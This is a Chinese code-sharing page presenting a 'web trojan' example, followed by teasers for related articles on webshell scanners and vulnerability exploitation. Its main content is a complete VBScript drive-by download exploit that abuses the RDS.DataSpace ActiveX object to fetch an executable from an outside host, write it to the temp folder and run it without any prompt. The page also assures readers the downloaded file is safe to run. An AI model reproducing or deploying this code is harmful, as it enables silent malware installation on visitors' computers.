网页木马代码例子(里面的文件是漏洞扫描器,呵呵)
对于经常上网冲浪的朋友对于网页木马一定不会陌生,打开某个网站,莫名其妙的运行了某个木马,虽然在"Internet选项"里有"安全"设置,但是下面的代码就不会弹出任何信息就直接运行了程序,不信,follow me!
(提示: 只是了解一下技术和方法,千万别搞破坏,yexj00.exe是一个windows2000 漏洞扫描器和查漏补缺用的,不是病毒或木马,放心运行。)
代码如下:
<script language="VBScript">
on error resume next
dl = "<a href="http://yexj00.5dm.cn/soft/yexj00.exe" target="_blank">http://yexj00.5dm.cn/soft/yexj00.exe</a>"
set ye=document.createElement("object")
yStr="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
ye.setAttribute "classid",yStr
Set x = ye.CreateObject("Microsoft.XMLHTTP","")
set S = ye.createobject("ADODB.Stream","")
S.type = 1
x.Open "GET", dl, False
x.Send
fname="win2000漏洞扫描器.exe"
set F = ye.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname= F.BuildPath(tmp,fname)
S.open
S.write x.responseBody
S.savetofile fname,2
S.close
set A=ye.createobject("Shell.Application","")
A.ShellExecute fname,"","", "open",1
</script>
相关推荐
-
asp和php页面全面封杀WVS扫描器的代码
Acunetix Web Vulnerability Scanner 是一款国外产的及其优秀的扫描工具,可以帮忙挖掘网站内的诸多漏洞,包括常见的SQLinjection,XSS(很多自认为牛人的就喜欢用WVS扫站发现XSS就公布说是他发现的...).既然WVS这么牛,那咱们就不给他访问网站的机会,像堵SQL注入一样来堵住它. 分析了一下WVS扫描时候的头文件,基本都包含它网站的英文名称:acunetix,于是我们从这个名称下手了.以下是三个版本的代码: 1.ASP(JScript)版,对于LBS
-
php之对抗Web扫描器的脚本技巧
大部分Web扫描器(包括上传.管理后台扫描器)都是通过判断HTTP的200返回来确定页面存在的,在页面存在的基础上,这些扫描期才会开始对漏洞进行扫描.既然不能保证内部逻辑的严密,那么就在输入/输出这个瓶颈上做文章,当输入错误的密码或者权限失败时,我们自己返回一个400错误的HTTP消息来误导扫描器不再继续进行扫描(包括哪些手工入侵者) 以PHP为例: 复制代码 代码如下: <?php ob_start(); if ('Password' != $_GET['password']) header(
-
PHP Web木马扫描器代码 v1.0 安全测试工具
scanner.php 复制代码 代码如下: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net , 转载请注明t00ls */ /* [+] 版本: v1.0 */ /* [+] 功能: web版php木马扫描工具 */
-
php木马webshell扫描器代码
复制代码 代码如下: <?php /* +--------------------------------------------------------------------------+ | Codz by indexphp Version:0.01 | | (c) 2009 indexphp | | http://www.indexphp.org | +--------------------------------------------------------------------
-
淘特ASP木马扫描器的代码
+-----------------+ |淘特ASP木马扫描器| +-----------------+ 本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序.系统采用扫描程序与病毒库分离的形式, 以后升级只需像杀毒软件那样升级病毒库就可以了.目前可以查杀所有流行的ASP木马程序. 系统提供了全站扫描.按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描.扫描过程,系统会记录
-
网页木马代码例子(里面的文件是漏洞扫描器,呵呵)
对于经常上网冲浪的朋友对于网页木马一定不会陌生,打开某个网站,莫名其妙的运行了某个木马,虽然在"Internet选项"里有"安全"设置,但是下面的代码就不会弹出任何信息就直接运行了程序,不信,follow me! (提示: 只是了解一下技术和方法,千万别搞破坏,yexj00.exe是一个windows2000 漏洞扫描器和查漏补缺用的,不是病毒或木马,放心运行.) 复制代码 代码如下: <script language="VBScript"
-
fastcgi文件读取漏洞之python扫描脚本
PHP FastCGI的远程利用 说到FastCGI,大家都知道这是目前最常见的webserver动态脚本执行模型之一.目前基本所有web脚本都基本支持这种模式,甚至有的类型脚本这是唯一的模式(ROR,Python等). FastCGI的主要目的就是,将webserver和动态语言的执行分开为两个不同的常驻进程,当webserver接收到动态脚本的请求,就通过fcgi协议将请求通过网络转发给fcgi进程,由fcgi进程进行处理之后,再将结果传送给webserver,然后webserver再输出给
-
asp又一个分页的代码例子
一个分页代码例子 <%''本程序文件名为:Pages.asp%> <%''包含ADO常量表文件adovbs.inc,可从"\Program Files\Common Files\System\ADO"目录下拷贝%> <!--#Include File="adovbs.inc"--> <%''*建立数据库连接,这里是Oracle8.05数据库 Set conn=Server.CreateObject("ADODB.C
-
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
一.漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞. 二.漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三.漏洞环境搭建 1.下载DeDeCMS V5.7 SP1,然后放到phpstudy环境下的www目录下,然后浏览器访http://192.168.10.171/dedecms/uploads/install/index.php 2.点击我已阅读并继
-
详解PHP渗透测试文件包含漏洞与利用
目录 什么是文件包含漏洞 文件包含漏洞的分类 本地文件包含 漏洞&利用 利用条件(以PHP为例) 直接访问文件 利用协议读取源代码 截断%00 长度截断 PHP的伪协议 file:// php:// data:// phar:// 远程文件包含 漏洞利用 远程包含webshell 代码审计 修复建议 什么是文件包含漏洞 文件包含,在网站开发人员开发网站时,会将经常重复的代码写道一个单独的文件中,在别的文件中可以使用文件包含的函数来引用单独的文件.目前很多语言都支持文件包含,例如php(inchu
-
ASP.NET(C#)实现一次性动态上传多张图片的代码(多个文件)
在做asp.net的Web开发的时候,我们经常会遇到一次性上传多个文件的需求.通常我们的解决方法是固定放多个上传文件框,这样的解决办法显然是不合理的,因为一次上传多个,就意味着数量不确定.因此我们就要让这些文件上传框动态添加,下面我以我做的一个图库管理中的上传图片的功能为例 先看效果: 打开的初始界面: 默认是上传一个图片,但当我们点"增加图片"按钮时可以实现选择多个图片及其描述同时上传,本功能限制一次最多只能上传8张,且每张图片大小不超过1M,这个大家可根据实际情况更改! 如图: 下
-
php操作redis中的hash和zset类型数据的方法和代码例子
前面一篇博客主要是string类型,list类型和set类型,下面hash类型和zset类型 1,hset 描述:将哈希表key中的域field的值设为value.如果key不存在,一个新的哈希表被创建并进行HSET操作.如果域field已经存在于哈希表中,旧值将被覆盖. 参数:key field value 返回值:如果field是哈希表中的一个新建域,并且值设置成功,返回1.如果哈希表中域field已经存在且旧值已被新值覆盖,返回0. 2,hsetnx 描述:将哈希表key中的域field的
-
利用C#代码将html样式文件与Word文档互换的方法
一.C#代码将html样式文件转为Word文档 首先有个这样的需求,将以下网页内容下载为Word文件. html代码: <div class="modal-body"> <div style="height:600px;width:550px; margin:0 auto;"> <table style="border-collapse:separate;border-spacing:10px;width: 100%"
-
Spring用代码来读取properties文件实例解析
有些时候,我们需要以Spring代码直接读取properties配置文件,那么我们要如何操作呢?下面我们来看看具体内容. 我们都知道,Spring可以@Value的方式读取properties中的值,只需要在配置文件中配置 org.springframework.beans.factory.config.PropertyPlaceholderConfigurer <bean id="propertyConfigurer" class="org.springframewo
-
Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现
一.漏洞描述 该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录.Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问. 二.漏洞影响版本 Apache ActiveMQ 5.0.0 - 5.13.2 三.漏洞环境搭建 1.官网下载apache-activemq-5.7.0-bin
随机推荐
- 全面优化ASP应用程序的性能的方法
- JavaScript利用split函数按规定截取字符串(获取邮箱用户名)
- 轻松玩转VMWare虚拟机之安装GHOST系统图文教程第1/2页
- 正则基础之 环视 Lookaround
- Mybatis 创建方法、全局配置教程详解
- 教你怎样用Oracle方便地查看报警日志错误
- 腾讯QQ微博API接口获取微博内容
- Python兔子毒药问题实例分析
- python中的多线程实例教程
- android根据分辨率自动调整字体大小的实例代码
- 关于javaScript注册click事件传递参数的不成功问题
- mysql如何处理varchar与nvarchar类型中的特殊字符
- node.js中的console.log方法使用说明
- C#画笔Pen画虚线的方法
- 微信小程序中form 表单提交和取值实例详解
- C语言实现的bitmap位图代码分享
- Java 分割字符串详解及实例代码
- Java本地缓存的实现代码
- 判断两颗二叉树是否相似的两种方法
- Python使用reportlab模块生成PDF格式的文档